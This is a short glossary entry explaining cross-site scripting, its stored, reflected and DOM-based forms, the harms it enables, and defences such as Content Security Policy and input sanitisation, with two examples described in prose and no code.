Cross-Site Scripting (XSS)
A web vulnerability in which attackers inject malicious scripts into trusted websites, which then execute in visitors' browsers to steal data or perform actions on their behalf.
Also known as: XSS, cross-site script injection
Last reviewed: 10 June 2026
Cross-site scripting (XSS) occurs when a website fails to properly sanitise user-supplied input before including it in pages served to other users. An attacker can inject a script that runs in the victim's browser in the context of the trusted site, bypassing the same-origin security policy. This enables cookie theft leading to session hijacking, credential harvesting via fake login forms overlaid on the page, keylogging, and redirecting the victim to malicious sites.
XSS is one of the most common web vulnerabilities. Stored XSS persists in a database and affects every visitor to the page; reflected XSS is triggered by a crafted URL sent to the victim; DOM-based XSS exploits client-side scripts.
Website developers should implement Content Security Policy (CSP) headers and sanitise all user input rigorously. Users benefit from keeping browsers updated and using script-blocking extensions on untrusted sites.
Examples
- An attacker posts a comment on a forum containing a script; every visitor who loads the page has their session cookie silently sent to the attacker.
- A crafted URL sent via email triggers a reflected XSS attack that submits a fund-transfer form while the victim is logged in.